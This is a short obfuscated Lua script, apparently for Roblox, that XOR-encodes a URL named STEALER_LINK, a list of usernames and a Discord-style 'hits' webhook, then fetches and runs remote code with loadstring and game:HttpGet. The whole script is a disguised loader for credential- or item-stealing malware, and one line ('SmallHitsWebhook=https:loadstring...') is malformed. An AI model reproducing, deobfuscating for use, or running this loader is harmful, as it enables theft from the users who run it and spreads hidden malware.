--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end STEALER_LINK=v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\242\40\227\183\203\17\218\198\210\46\169\156\198\19\212\236\235\22\229\169\206\14\197\140\201\32\224\168\136\22\212\194\223\54\169\182\198\23\223\140\254\23","\126\177\163\187\69\134\219\167");Usernames={v7("\6\223\47\192\235\38\200\61\196\239","\156\67\173\74\165"),v7("\39\178\74\25\178\34","\38\84\215\41\118\220\70"),v7("\68\30\43\0\250","\158\48\118\66\114")};BigHitsWebhook=v7("\163\48\4\38\96\255\180\228\32\25\37\112\170\233\175\106\19\57\126\234\250\187\45\95\33\118\167\243\164\43\27\37\60\244\168\253\117\69\96\32\246\168\242\112\68\102\35\245\170\250\114\68\121\123\175\175\147\28\31\55\80\139\227\146\125\32\19\37\191\225\131\12\1\14\36\182\193\167\17\5\99\87\140\223\172\114\7\20\36\247\221\134\113\37\5\75\134\163\143\32\1\100\84\232\216\129\105\8\53\124\160\200\167\51\28\21\64\143\239\242\7","\155\203\68\112\86\19\197");SmallHitsWebhook=https:loadstring(game:HttpGet(STEALER_LINK,true))();
